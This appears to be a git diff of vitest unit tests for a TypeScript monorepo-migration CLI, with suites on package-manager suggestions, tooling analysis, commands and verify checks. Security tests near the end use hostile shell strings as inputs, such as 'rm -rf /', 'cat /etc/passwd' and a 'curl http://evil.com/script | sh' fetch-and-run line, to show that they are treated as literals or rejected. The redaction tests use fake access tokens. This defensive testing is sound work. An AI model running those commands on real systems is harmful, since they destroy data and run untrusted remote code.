expect(result.suggestion).toBe('pnpm'); + expect(result.evidence).toContain('Tied between package managers, preferring pnpm'); + }); + + it('should default to pnpm with low confidence when no signals found', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + }); + + const result = await suggestPackageManager([ + { path: repoA, name: 'repo-a' }, + ]); + + expect(result.suggestion).toBe('pnpm'); + expect(result.confidence).toBe('low'); + }); + + it('should use majority vote with mixed lockfiles', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'yarn.lock': '' }, + }); + const repoB = await createTempFixture({ + name: 'repo-b', + packageJson: { name: 'repo-b', version: '1.0.0' }, + files: { 'yarn.lock': '' }, + }); + const repoC = await createTempFixture({ + name: 'repo-c', + packageJson: { name: 'repo-c', version: '1.0.0' }, + files: { 'pnpm-lock.yaml': '' }, + }); + + const result = await suggestPackageManager([ + { path: repoA, name: 'repo-a' }, + { path: repoB, name: 'repo-b' }, + { path: repoC, name: 'repo-c' }, + ]); + + expect(result.suggestion).toBe('yarn'); + expect(result.confidence).toBe('medium'); + }); + + it('should include alternatives in the result', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'pnpm-lock.yaml': '' }, + }); + + const result = await suggestPackageManager([ + { path: repoA, name: 'repo-a' }, + ]); + + expect(result.alternatives).toContain('yarn'); + expect(result.alternatives).toContain('npm'); + expect(result.alternatives).not.toContain('pnpm'); + }); + + it('should include evidence when package.json is malformed', async () => { + const repoA = await createTempFixture({ + name: 'repo-malformed-suggestions', + files: { + 'package.json': '{ invalid json !!!', + }, + }); + + const 
result = await suggestPackageManager([ + { path: repoA, name: 'repo-malformed-suggestions' }, + ]); + + expect( + result.evidence.some((e) => e.includes('Could not parse package.json in repo-malformed-suggestions')) + ).toBe(true); + }); +}); + +describe('suggestWorkspaceTool', () => { + it('should suggest turbo when repos have turbo.json', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'turbo.json': '{}' }, + }); + const repoB = await createTempFixture({ + name: 'repo-b', + packageJson: { name: 'repo-b', version: '1.0.0' }, + files: { 'turbo.json': '{}' }, + }); + + const result = await suggestWorkspaceTool([ + { path: repoA, name: 'repo-a' }, + { path: repoB, name: 'repo-b' }, + ]); + + expect(result.suggestion).toBe('turbo'); + expect(result.confidence).toBe('high'); + expect(result.topic).toBe('workspace-tool'); + expect(result.evidence).toContain('repo-a has turbo.json'); + expect(result.evidence).toContain('repo-b has turbo.json'); + }); + + it('should suggest nx when repos have nx.json', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'nx.json': '{}' }, + }); + + const result = await suggestWorkspaceTool([ + { path: repoA, name: 'repo-a' }, + ]); + + expect(result.suggestion).toBe('nx'); + expect(result.confidence).toBe('high'); + }); + + it('should suggest none when no tool configs found', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + }); + + const result = await suggestWorkspaceTool([ + { path: repoA, name: 'repo-a' }, + ]); + + expect(result.suggestion).toBe('none'); + expect(result.confidence).toBe('medium'); + expect(result.evidence).toContain('No workspace tool configs found in any repo'); + }); + + it('should handle mixed turbo and nx with low confidence', async () => { + const repoA = await 
createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'turbo.json': '{}' }, + }); + const repoB = await createTempFixture({ + name: 'repo-b', + packageJson: { name: 'repo-b', version: '1.0.0' }, + files: { 'nx.json': '{}' }, + }); + + const result = await suggestWorkspaceTool([ + { path: repoA, name: 'repo-a' }, + { path: repoB, name: 'repo-b' }, + ]); + + expect(result.confidence).toBe('low'); + expect(result.evidence).toContain('Both turbo and nx configs found across repos'); + }); + + it('should give medium confidence when only some repos have the tool', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'turbo.json': '{}' }, + }); + const repoB = await createTempFixture({ + name: 'repo-b', + packageJson: { name: 'repo-b', version: '1.0.0' }, + }); + + const result = await suggestWorkspaceTool([ + { path: repoA, name: 'repo-a' }, + { path: repoB, name: 'repo-b' }, + ]); + + expect(result.suggestion).toBe('turbo'); + expect(result.confidence).toBe('medium'); + }); + + it('should include alternatives in the result', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'nx.json': '{}' }, + }); + + const result = await suggestWorkspaceTool([ + { path: repoA, name: 'repo-a' }, + ]); + + expect(result.alternatives).toContain('turbo'); + expect(result.alternatives).toContain('none'); + expect(result.alternatives).not.toContain('nx'); + }); +}); + +describe('suggestDependencyStrategy', () => { + it('should suggest hoist with high confidence when no conflicts', () => { + const result = suggestDependencyStrategy([]); + + expect(result.suggestion).toBe('hoist'); + expect(result.confidence).toBe('high'); + expect(result.evidence).toContain('No dependency conflicts detected'); + expect(result.topic).toBe('dependency-strategy'); + }); + + it('should suggest 
isolate when majority are incompatible', () => { + const conflicts: DependencyConflict[] = [ + { + name: 'react', + versions: [ + { version: '^16.0.0', source: 'repo-a', type: 'dependencies' }, + { version: '^18.0.0', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'incompatible', + }, + { + name: 'vue', + versions: [ + { version: '^2.0.0', source: 'repo-a', type: 'dependencies' }, + { version: '^3.0.0', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'incompatible', + }, + { + name: 'lodash', + versions: [ + { version: '^4.17.20', source: 'repo-a', type: 'dependencies' }, + { version: '^4.17.21', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'minor', + }, + ]; + + const result = suggestDependencyStrategy(conflicts); + + expect(result.suggestion).toBe('isolate'); + expect(result.confidence).toBe('high'); + expect(result.evidence.some((e) => e.includes('incompatible'))).toBe(true); + }); + + it('should suggest hoist when all conflicts are minor', () => { + const conflicts: DependencyConflict[] = [ + { + name: 'lodash', + versions: [ + { version: '^4.17.20', source: 'repo-a', type: 'dependencies' }, + { version: '^4.17.21', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'minor', + }, + { + name: 'uuid', + versions: [ + { version: '^9.0.0', source: 'repo-a', type: 'dependencies' }, + { version: '^9.0.1', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'minor', + }, + ]; + + const result = suggestDependencyStrategy(conflicts); + + expect(result.suggestion).toBe('hoist'); + expect(result.confidence).toBe('high'); + }); + + it('should suggest hoist-with-overrides for mixed severities with some incompatible', () => { + const conflicts: DependencyConflict[] = [ + { + name: 'react', + versions: [ + { version: '^16.0.0', source: 'repo-a', type: 'dependencies' }, + { version: '^18.0.0', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'incompatible', + }, + { + name: 'lodash', + versions: [ + { version: 
'^4.17.20', source: 'repo-a', type: 'dependencies' }, + { version: '^4.17.21', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'minor', + }, + { + name: 'express', + versions: [ + { version: '^4.18.0', source: 'repo-a', type: 'dependencies' }, + { version: '^4.19.0', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'minor', + }, + { + name: 'axios', + versions: [ + { version: '^0.27.0', source: 'repo-a', type: 'dependencies' }, + { version: '^1.0.0', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'major', + }, + ]; + + const result = suggestDependencyStrategy(conflicts); + + expect(result.suggestion).toBe('hoist-with-overrides'); + expect(result.confidence).toBe('medium'); + }); + + it('should suggest hoist-with-overrides for only major conflicts', () => { + const conflicts: DependencyConflict[] = [ + { + name: 'axios', + versions: [ + { version: '^0.27.0', source: 'repo-a', type: 'dependencies' }, + { version: '^1.0.0', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'major', + }, + ]; + + const result = suggestDependencyStrategy(conflicts); + + expect(result.suggestion).toBe('hoist-with-overrides'); + expect(result.confidence).toBe('medium'); + }); + + it('should include alternatives in the result', () => { + const result = suggestDependencyStrategy([]); + + expect(result.alternatives).toContain('isolate'); + expect(result.alternatives).toContain('hoist-with-overrides'); + expect(result.alternatives).not.toContain('hoist'); + }); +}); diff --git a/tests/unit/analyzers/tooling.test.ts b/tests/unit/analyzers/tooling.test.ts new file mode 100755 index 0000000..135566d --- /dev/null +++ b/tests/unit/analyzers/tooling.test.ts @@ -0,0 +1,84 @@ +import { describe, it, expect, afterEach } from 'vitest'; +import { analyzeTooling } from '../../../src/analyzers/tooling.js'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; +import { createMockLogger } from '../../helpers/mocks.js'; + 
+describe('analyzeTooling', () => { + const logger = createMockLogger(); + + afterEach(async () => { + await cleanupFixtures(); + }); + + it('should detect inconsistent TypeScript usage', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'a', version: '1.0.0' }, + files: { 'tsconfig.json': '{}' }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-b', + packageJson: { name: 'b', version: '1.0.0' }, + }); + + const findings = await analyzeTooling( + [{ path: repoAPath, name: 'repo-a' }, { path: repoBPath, name: 'repo-b' }], + logger, + ); + + const tsInconsistent = findings.find((f) => f.id === 'tooling-inconsistent-typescript'); + expect(tsInconsistent).toBeDefined(); + }); + + it('should flag executable ESLint configs', async () => { + const repoPath = await createTempFixture({ + name: 'repo-js-config', + packageJson: { name: 'test', version: '1.0.0' }, + files: { 'eslint.config.js': 'module.exports = {};' }, + }); + + const findings = await analyzeTooling( + [{ path: repoPath, name: 'repo-js-config' }], + logger, + ); + + const jsConfig = findings.find((f) => f.id === 'tooling-executable-config-eslint'); + expect(jsConfig).toBeDefined(); + expect(jsConfig!.severity).toBe('warn'); + }); + + it('should flag missing test scripts', async () => { + const repoPath = await createTempFixture({ + name: 'repo-no-test', + packageJson: { name: 'test', version: '1.0.0', scripts: { build: 'tsc' } }, + }); + + const findings = await analyzeTooling( + [{ path: repoPath, name: 'repo-no-test' }], + logger, + ); + + const noTest = findings.find((f) => f.id === 'tooling-no-test-repo-no-test'); + expect(noTest).toBeDefined(); + }); + + it('should report malformed package.json instead of silently skipping', async () => { + const repoPath = await createTempFixture({ + name: 'repo-malformed-tooling', + files: { + 'package.json': '{ invalid json !!!', + }, + }); + + const findings = await analyzeTooling( + [{ path: 
repoPath, name: 'repo-malformed-tooling' }], + logger, + ); + + const malformed = findings.find( + (f) => f.id === 'tooling-malformed-package-json-repo-malformed-tooling' + ); + expect(malformed).toBeDefined(); + expect(malformed?.severity).toBe('warn'); + }); +}); diff --git a/tests/unit/commands/add.test.ts b/tests/unit/commands/add.test.ts new file mode 100755 index 0000000..96b93bc --- /dev/null +++ b/tests/unit/commands/add.test.ts @@ -0,0 +1,100 @@ +import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; +import path from 'node:path'; +import { generateAddPlan } from '../../../src/strategies/add.js'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; +import { createMockLogger } from '../../helpers/mocks.js'; + +describe('add command / generateAddPlan', () => { + const logger = createMockLogger(); + + afterEach(async () => { + await cleanupFixtures(); + vi.restoreAllMocks(); + }); + + it('should generate an AddPlan from a local repo', async () => { + // Create a fake monorepo target + const targetPath = await createTempFixture({ + name: 'monorepo-target', + packageJson: { + name: 'test-monorepo', + private: true, + workspaces: ['packages/*'], + }, + directories: ['packages/existing-pkg'], + files: { + 'packages/existing-pkg/package.json': JSON.stringify({ + name: 'existing-pkg', + version: '1.0.0', + dependencies: { lodash: '^4.17.21' }, + }), + }, + }); + + // Create a source repo to add + const sourcePath = await createTempFixture({ + name: 'new-package', + packageJson: { + name: 'new-package', + version: '1.0.0', + dependencies: { lodash: '^4.17.20' }, + }, + files: { + 'src/index.ts': 'export const hello = "world";', + }, + }); + + const plan = await generateAddPlan(sourcePath, { + to: targetPath, + packagesDir: 'packages', + conflictStrategy: 'highest', + packageManager: 'pnpm', + }, logger); + + expect(plan.schemaVersion).toBe(1); + expect(plan.sourceRepo).toBeDefined(); + 
expect(plan.sourceRepo.name).toContain('new-package'); + expect(plan.targetMonorepo).toBe(targetPath); + expect(plan.packagesDir).toBe('packages'); + expect(plan.operations.length).toBeGreaterThan(0); + expect(plan.operations[0].type).toBe('copy'); + expect(plan.createdAt).toBeDefined(); + }); + + it('should throw if target monorepo does not exist', async () => { + const sourcePath = await createTempFixture({ + name: 'some-repo', + packageJson: { name: 'some-repo', version: '1.0.0' }, + }); + + await expect( + generateAddPlan(sourcePath, { + to: '/nonexistent/path', + packagesDir: 'packages', + conflictStrategy: 'highest', + packageManager: 'pnpm', + }, logger), + ).rejects.toThrow('Target monorepo does not exist'); + }); + + it('should throw if target has no package.json', async () => { + const targetPath = await createTempFixture({ + name: 'no-pkg-target', + directories: ['packages'], + }); + + const sourcePath = await createTempFixture({ + name: 'some-repo', + packageJson: { name: 'some-repo', version: '1.0.0' }, + }); + + await expect( + generateAddPlan(sourcePath, { + to: targetPath, + packagesDir: 'packages', + conflictStrategy: 'highest', + packageManager: 'pnpm', + }, logger), + ).rejects.toThrow('No package.json found'); + }); +}); diff --git a/tests/unit/commands/archive.test.ts b/tests/unit/commands/archive.test.ts new file mode 100755 index 0000000..df97701 --- /dev/null +++ b/tests/unit/commands/archive.test.ts @@ -0,0 +1,45 @@ +import { describe, it, expect } from 'vitest'; +import { generateArchivePlan, generateReadmeDeprecationPatch } from '../../../src/strategies/archive.js'; + +describe('archive command / generateArchivePlan', () => { + it('should generate README deprecation patches without a token', () => { + const patch = generateReadmeDeprecationPatch('my-lib', 'https://github.com/org/monorepo'); + expect(patch).toContain('--- a/README.md'); + expect(patch).toContain('+++ b/README.md'); + expect(patch).toContain('migrated to a monorepo'); + 
expect(patch).toContain('https://github.com/org/monorepo'); + expect(patch).toContain('my-lib'); + }); + + it('should generate an ArchivePlan from repo inputs', async () => { + const plan = await generateArchivePlan( + ['owner/repo-a', 'owner/repo-b'], + 'https://github.com/org/monorepo', + ); + + expect(plan.schemaVersion).toBe(1); + expect(plan.repos).toHaveLength(2); + expect(plan.repos[0].name).toBe('repo-a'); + expect(plan.repos[1].name).toBe('repo-b'); + expect(plan.monorepoUrl).toBe('https://github.com/org/monorepo'); + expect(plan.repos[0].readmePatch).toContain('migrated to a monorepo'); + expect(plan.apiOperations).toBeUndefined(); + }); + + it('should include API operations when tokenFromEnv is true', async () => { + const plan = await generateArchivePlan( + ['owner/repo-a'], + 'https://github.com/org/monorepo', + { tokenFromEnv: true }, + ); + + expect(plan.apiOperations).toHaveLength(1); + expect(plan.apiOperations![0].action).toBe('archive'); + }); + + it('should throw for invalid repo sources', async () => { + await expect( + generateArchivePlan([], 'https://github.com/org/monorepo'), + ).rejects.toThrow(); + }); +}); diff --git a/tests/unit/commands/migrate-branch.test.ts b/tests/unit/commands/migrate-branch.test.ts new file mode 100755 index 0000000..938e36d --- /dev/null +++ b/tests/unit/commands/migrate-branch.test.ts @@ -0,0 +1,42 @@ +import { describe, it, expect, vi, afterEach } from 'vitest'; +import { checkBranchMigratePrerequisites, branchMigrateDryRun } from '../../../src/strategies/migrate-branch.js'; + +describe('migrate-branch command', () => { + afterEach(() => { + vi.restoreAllMocks(); + }); + + describe('checkBranchMigratePrerequisites', () => { + it('should report issues for non-existent source', async () => { + const result = await checkBranchMigratePrerequisites( + '/nonexistent/source', + '/nonexistent/target', + 'subtree', + ); + expect(result.ok).toBe(false); + expect(result.issues.length).toBeGreaterThan(0); + 
expect(result.issues.some((i) => i.includes('Source'))).toBe(true); + }); + + it('should accept valid paths', async () => { + // Use test fixture paths that exist + const result = await checkBranchMigratePrerequisites( + process.cwd(), // Current dir is likely a git repo + process.cwd(), + 'subtree', + ); + // Should at least not fail on path existence + // Might fail on shallow clone check depending on env + expect(result.issues.every((i) => !i.includes('not found'))).toBe(true); + }); + }); + + describe('branchMigrateDryRun', () => { + it('should return zero counts for non-git directory', async () => { + const result = await branchMigrateDryRun('/tmp', 'main'); + expect(result.commitCount).toBe(0); + expect(result.estimatedTime).toBe('unknown'); + expect(result.contributors).toEqual([]); + }); + }); +}); diff --git a/tests/unit/commands/ui.test.ts b/tests/unit/commands/ui.test.ts new file mode 100644 index 0000000..b7ce21c --- /dev/null +++ b/tests/unit/commands/ui.test.ts @@ -0,0 +1,71 @@ +import { EventEmitter } from 'node:events'; +import { describe, it, expect, vi, beforeEach } from 'vitest'; +import { CliExitError } from '../../../src/utils/errors.js'; + +const createServerMock = vi.hoisted(() => vi.fn()); +const createLoggerMock = vi.hoisted(() => vi.fn()); + +vi.mock('../../../src/server/index.js', () => ({ + createServer: createServerMock, +})); + +vi.mock('../../../src/utils/logger.js', () => ({ + createLogger: createLoggerMock, +})); + +vi.mock('node:child_process', () => ({ + execFile: vi.fn(), +})); + +import { uiCommand } from '../../../src/commands/ui.js'; + +class MockServer extends EventEmitter { + address() { + return { port: 3847 }; + } +} + +describe('uiCommand', () => { + beforeEach(() => { + vi.clearAllMocks(); + createLoggerMock.mockReturnValue({ + success: vi.fn(), + info: vi.fn(), + warn: vi.fn(), + error: vi.fn(), + debug: vi.fn(), + log: vi.fn(), + }); + }); + + it('throws CliExitError for invalid port input', async () => { + await 
expect(uiCommand({ port: 'invalid', open: false, verbose: false })).rejects.toBeInstanceOf(CliExitError); + expect(createServerMock).not.toHaveBeenCalled(); + }); + + it('rejects with CliExitError when server emits EADDRINUSE', async () => { + const server = new MockServer(); + createServerMock.mockReturnValue({ server, token: 'token-abc' }); + + const promise = uiCommand({ port: '3847', open: false, verbose: false }); + setImmediate(() => { + const err = Object.assign(new Error('port in use'), { code: 'EADDRINUSE' }); + server.emit('error', err); + }); + + await expect(promise).rejects.toBeInstanceOf(CliExitError); + }); + + it('resolves when server closes cleanly', async () => { + const server = new MockServer(); + createServerMock.mockReturnValue({ server, token: 'token-abc' }); + + const promise = uiCommand({ port: '3847', open: false, verbose: false }); + setImmediate(() => { + server.emit('listening'); + server.emit('close'); + }); + + await expect(promise).resolves.toBeUndefined(); + }); +}); diff --git a/tests/unit/commands/verify-checks.test.ts b/tests/unit/commands/verify-checks.test.ts index c7c7c51..e0a99e0 100755 --- a/tests/unit/commands/verify-checks.test.ts +++ b/tests/unit/commands/verify-checks.test.ts @@ -1,4 +1,8 @@ import { describe, it, expect } from 'vitest'; +import path from 'node:path'; +import os from 'node:os'; +import crypto from 'node:crypto'; +import fs from 'fs-extra'; import type { ApplyPlan } from '../../../src/types/index.js'; import type { VerifyContext } from '../../../src/commands/verify-checks.js'; import { @@ -39,6 +43,13 @@ function planCtx(plan: ApplyPlan): VerifyContext { return { plan, dir: null }; } +async function createTempDir(prefix: string): Promise<string> { + const id = crypto.randomBytes(6).toString('hex'); + const dir = path.join(os.tmpdir(), `${prefix}-${id}`); + await fs.ensureDir(dir); + return dir; +} + // --------------------------------------------------------------------------- // checkRootPackageJson // 
--------------------------------------------------------------------------- @@ -107,6 +118,33 @@ describe('checkWorkspaceConfig', () => { const checks = await checkWorkspaceConfig(planCtx(plan)); expect(checks[0].status).toBe('fail'); }); + + it('returns explicit failure when root package.json cannot be read (dir mode)', async () => { + const dir = await createTempDir('verify-workspace-config'); + try { + await fs.writeFile(path.join(dir, 'package.json'), '{ invalid json }', 'utf-8'); + + const checks = await checkWorkspaceConfig({ plan: null, dir }); + expect(checks.find((c) => c.id === 'workspace-config')?.status).toBe('fail'); + expect(checks.find((c) => c.id === 'workspace-config:root-package-json')?.status).toBe('fail'); + } finally { + await fs.remove(dir).catch(() => {}); + } + }); + + it('still reports root package read failure even when pnpm-workspace.yaml exists', async () => { + const dir = await createTempDir('verify-workspace-config'); + try { + await fs.writeFile(path.join(dir, 'package.json'), '{ invalid json }', 'utf-8'); + await fs.writeFile(path.join(dir, 'pnpm-workspace.yaml'), "packages:\n - 'packages/*'\n", 'utf-8'); + + const checks = await checkWorkspaceConfig({ plan: null, dir }); + expect(checks.find((c) => c.id === 'workspace-config')?.status).toBe('pass'); + expect(checks.find((c) => c.id === 'workspace-config:root-package-json')?.status).toBe('fail'); + } finally { + await fs.remove(dir).catch(() => {}); + } + }); }); // --------------------------------------------------------------------------- @@ -139,6 +177,24 @@ describe('checkPackageNames', () => { const checks = await checkPackageNames(planCtx(plan)); expect(checks[0].status).toBe('warn'); }); + + it('fails when package.json files cannot be parsed (dir mode)', async () => { + const dir = await createTempDir('verify-package-names'); + try { + await fs.ensureDir(path.join(dir, 'packages', 'pkg-a')); + await fs.writeFile( + path.join(dir, 'packages', 'pkg-a', 'package.json'), + '{ 
invalid json }', + 'utf-8' + ); + + const checks = await checkPackageNames({ plan: null, dir }); + expect(checks.find((c) => c.id.startsWith('pkg-read-error:'))?.status).toBe('fail'); + expect(checks.find((c) => c.id === 'pkg-names')?.status).toBe('fail'); + } finally { + await fs.remove(dir).catch(() => {}); + } + }); }); // --------------------------------------------------------------------------- @@ -272,4 +328,18 @@ describe('checkRequiredFields', () => { const enginesCheck = checks.find((c) => c.id === 'root-engines'); expect(enginesCheck?.status).toBe('warn'); }); + + it('fails when root package.json cannot be read (dir mode)', async () => { + const dir = await createTempDir('verify-required-fields'); + try { + await fs.writeFile(path.join(dir, 'package.json'), '{ invalid json }', 'utf-8'); + + const checks = await checkRequiredFields({ plan: null, dir }); + const enginesCheck = checks.find((c) => c.id === 'root-engines'); + expect(enginesCheck?.status).toBe('fail'); + expect(enginesCheck?.message).toContain('Could not read root package.json'); + } finally { + await fs.remove(dir).catch(() => {}); + } + }); }); diff --git a/tests/unit/security/command-injection.test.ts b/tests/unit/security/command-injection.test.ts new file mode 100644 index 0000000..985ef8d --- /dev/null +++ b/tests/unit/security/command-injection.test.ts @@ -0,0 +1,157 @@ +import { describe, it, expect } from 'vitest'; +import { safeExecFile } from '../../../src/utils/exec.js'; + +/** + * Command injection security tests. + * + * These verify that safeExecFile (which uses execFile with shell: false) + * cannot be exploited via shell metacharacters, command substitution, + * pipe chains, or environment variable expansion — because no shell + * interpreter is involved. 
+ */ + +describe('safeExecFile – shell injection prevention', () => { + async function runLiteral(args: string[]): Promise<string> { + const result = await safeExecFile( + process.execPath, + ['-e', 'process.stdout.write(process.argv.slice(1).join(" "))', ...args], + ); + return result.stdout; + } + + it('should treat shell metacharacters as literal arguments', async () => { + // If a shell were invoked, "hello; rm -rf /" would execute two commands. + // With execFile(shell:false), it is passed through as a single literal argument. + const stdout = await runLiteral(['hello; rm -rf /']); + expect(stdout).toBe('hello; rm -rf /'); + }); + + it('should treat pipe operator as literal text', async () => { + const stdout = await runLiteral(['hello | cat /etc/passwd']); + expect(stdout).toBe('hello | cat /etc/passwd'); + }); + + it('should treat command substitution as literal text', async () => { + const stdout = await runLiteral(['$(whoami)']); + expect(stdout).toBe('$(whoami)'); + }); + + it('should treat backtick substitution as literal text', async () => { + const stdout = await runLiteral(['`whoami`']); + expect(stdout).toBe('`whoami`'); + }); + + it('should treat environment variable expansion as literal text', async () => { + const stdout = await runLiteral(['$HOME']); + expect(stdout).toBe('$HOME'); + }); + + it('should treat ampersand background operator as literal text', async () => { + const stdout = await runLiteral(['hello & echo injected']); + expect(stdout).toBe('hello & echo injected'); + }); + + it('should treat redirects as literal text', async () => { + const stdout = await runLiteral(['hello > /tmp/evil']); + expect(stdout).toBe('hello > /tmp/evil'); + }); + + it('should treat newline-separated commands as single argument', async () => { + const stdout = await runLiteral(['hello\nwhoami']); + // the argv-echo helper outputs the literal string including the newline + expect(stdout).toContain('hello'); + expect(stdout).toContain('whoami'); + }); + + it('should pass arguments with special 
characters safely', async () => { + const stdout = await runLiteral(['"quotes"', "'singles'", '\\backslash']); + expect(stdout).toContain('"quotes"'); + expect(stdout).toContain("'singles'"); + expect(stdout).toContain('\\backslash'); + }); +}); + +describe('safeExecFile – install command whitelist', () => { + // Re-implement the whitelist check from apply.ts for direct testing + const ALLOWED_INSTALL_EXECUTABLES = new Set(['pnpm', 'npm', 'yarn', 'bun', 'npx']); + + function validateInstallCommand(cmd: string): { exe: string; args: string[] } { + const parts = cmd.split(/\s+/).filter(Boolean); + if (parts.length === 0) { + throw new Error('Install command is empty'); + } + const exe = parts[0]; + if (!ALLOWED_INSTALL_EXECUTABLES.has(exe)) { + throw new Error( + `Install command executable "${exe}" is not allowed. ` + + `Allowed executables: ${[...ALLOWED_INSTALL_EXECUTABLES].join(', ')}` + ); + } + return { exe, args: parts.slice(1) }; + } + + it('should allow pnpm install', () => { + const { exe, args } = validateInstallCommand('pnpm install --ignore-scripts'); + expect(exe).toBe('pnpm'); + expect(args).toEqual(['install', '--ignore-scripts']); + }); + + it('should allow npm install', () => { + const { exe, args } = validateInstallCommand('npm install --ignore-scripts'); + expect(exe).toBe('npm'); + expect(args).toEqual(['install', '--ignore-scripts']); + }); + + it('should allow yarn install', () => { + const { exe, args } = validateInstallCommand('yarn install --ignore-scripts'); + expect(exe).toBe('yarn'); + expect(args).toEqual(['install', '--ignore-scripts']); + }); + + it('should allow bun install', () => { + const { exe } = validateInstallCommand('bun install'); + expect(exe).toBe('bun'); + }); + + it('should reject arbitrary executables', () => { + expect(() => validateInstallCommand('rm -rf /')).toThrow('not allowed'); + expect(() => validateInstallCommand('curl http://evil.com/script | sh')).toThrow('not allowed'); + expect(() => 
validateInstallCommand('bash -c "evil"')).toThrow('not allowed'); + expect(() => validateInstallCommand('python -c "import os; os.system(\'rm -rf /\')"')).toThrow('not allowed'); + }); + + it('should reject empty command', () => { + expect(() => validateInstallCommand('')).toThrow('empty'); + expect(() => validateInstallCommand(' ')).toThrow('empty'); + }); + + it('should reject commands with path prefixes', () => { + expect(() => validateInstallCommand('/usr/bin/pnpm install')).toThrow('not allowed'); + expect(() => validateInstallCommand('./node_modules/.bin/pnpm install')).toThrow('not allowed'); + }); + + it('should reject commands disguised as allowed ones', () => { + expect(() => validateInstallCommand('pnpm-evil install')).toThrow('not allowed'); + expect(() => validateInstallCommand('npx-custom install')).toThrow('not allowed'); + }); +}); + +describe('safeExecFile – timeout and resource limits', () => { + it('should enforce timeout on long-running commands', async () => { + await expect( + safeExecFile(process.execPath, ['-e', 'setTimeout(() => {}, 60_000)'], { timeout: 200 }) + ).rejects.toThrow(); + }); + + it('should not pass shell: true', async () => { + // Verify that attempting shell features fails (they are literal) + // This is the definitive test: if shell were true, "echo hello && echo world" + // would output two lines. With shell:false, echo gets "hello", "&&", "echo", "world" + // as separate arguments. 
+ const result = await safeExecFile( + process.execPath, + ['-e', 'process.stdout.write(process.argv.slice(1).join(" "))', 'hello', '&&', 'echo', 'world'], + ); + expect(result.stdout).toBe('hello && echo world'); + }); +}); diff --git a/tests/unit/security/credential-redaction.test.ts b/tests/unit/security/credential-redaction.test.ts new file mode 100644 index 0000000..ce4c5a6 --- /dev/null +++ b/tests/unit/security/credential-redaction.test.ts @@ -0,0 +1,182 @@ +import { describe, it, expect } from 'vitest'; +import { redact, redactUrl, redactTokens } from '../../../src/utils/redact.js'; + +/** + * Credential redaction security tests. + * + * These verify that tokens, passwords, and credentials are + * properly stripped from URLs, error messages, and log output + * before they can be exposed to users or written to disk. + */ + +describe('redactUrl – URL credential stripping', () => { + it('should redact username:password from HTTPS URLs', () => { + expect(redactUrl('https://user:pass@github.com/org/repo')).toBe( + 'https://***@github.com/org/repo' + ); + }); + + it('should redact token-only credentials from HTTPS URLs', () => { + expect(redactUrl('https://ghp_abc123def456ghi789jkl012mno345pqr678@github.com/org/repo')).toBe( + 'https://***@github.com/org/repo' + ); + }); + + it('should redact credentials from git:// URLs', () => { + expect(redactUrl('git://user:token@example.com/repo.git')).toBe( + 'git://***@example.com/repo.git' + ); + }); + + it('should not modify SSH URLs (no credentials in URL)', () => { + expect(redactUrl('git@github.com:owner/repo.git')).toBe( + 'git@github.com:owner/repo.git' + ); + }); + + it('should not modify local paths', () => { + expect(redactUrl('/local/path/to/repo')).toBe('/local/path/to/repo'); + }); + + it('should not modify URLs without credentials', () => { + expect(redactUrl('https://github.com/org/repo')).toBe( + 'https://github.com/org/repo' + ); + }); + + it('should handle multiple URLs in one string', () => { + const 
input = 'cloning https://user:pass@host1.com/a and https://token@host2.com/b'; + const result = redactUrl(input); + expect(result).toBe('cloning https://***@host1.com/a and https://***@host2.com/b'); + }); +}); + +describe('redactTokens – known token pattern stripping', () => { + it('should redact GitHub personal access tokens (ghp_)', () => { + const token = 'ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm'; + expect(redactTokens(`token: ${token}`)).toBe('token: ***'); + }); + + it('should redact GitHub OAuth tokens (gho_)', () => { + const token = 'gho_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm'; + expect(redactTokens(`auth: ${token}`)).toBe('auth: ***'); + }); + + it('should redact GitHub user-to-server tokens (ghu_)', () => { + const token = 'ghu_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm'; + expect(redactTokens(token)).toBe('***'); + }); + + it('should redact GitHub server-to-server tokens (ghs_)', () => { + const token = 'ghs_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm'; + expect(redactTokens(token)).toBe('***'); + }); + + it('should redact GitHub refresh tokens (ghr_)', () => { + const token = 'ghr_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm'; + expect(redactTokens(token)).toBe('***'); + }); + + it('should redact GitLab personal access tokens (glpat-)', () => { + const token = 'glpat-ABCDEFGHIJKLMNOPQRSTUVWXYZab'; + expect(redactTokens(`GL_TOKEN=${token}`)).toBe('GL_TOKEN=***'); + }); + + it('should redact npm tokens (npm_)', () => { + const token = 'npm_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm'; + 